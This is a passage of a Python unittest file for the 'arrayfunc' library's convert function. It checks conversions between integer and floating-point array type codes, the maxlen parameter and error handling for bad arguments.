"""Test convert for basic operation in array code H - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code H - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_H(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'H'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code H - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code H - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code H - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code H - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code H - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code H - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code H - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_i(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'i'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code i - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code i - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code i - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code i - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code i - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code i - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code i - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code i - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code i - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code i - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code i - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code i - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code i - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_i(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'i'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code i - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code i - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code i - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code i - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code i - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code i - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code i - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_I(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'I'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code I - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code I - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code I - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code I - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code I - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code I - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code I - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code I - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code I - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code I - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code I - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code I - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code I - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_I(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'I'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code I - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code I - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code I - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code I - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code I - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code I - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code I - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_l(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'l'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code l - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code l - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code l - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code l - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code l - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code l - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code l - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code l - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code l - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code l - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code l - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code l - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code l - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_l(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'l'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code l - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code l - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code l - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code l - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code l - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code l - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code l - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_L(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'L'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code L - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code L - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code L - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code L - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code L - Convert to array code i.
"""
outputtest = 'i'
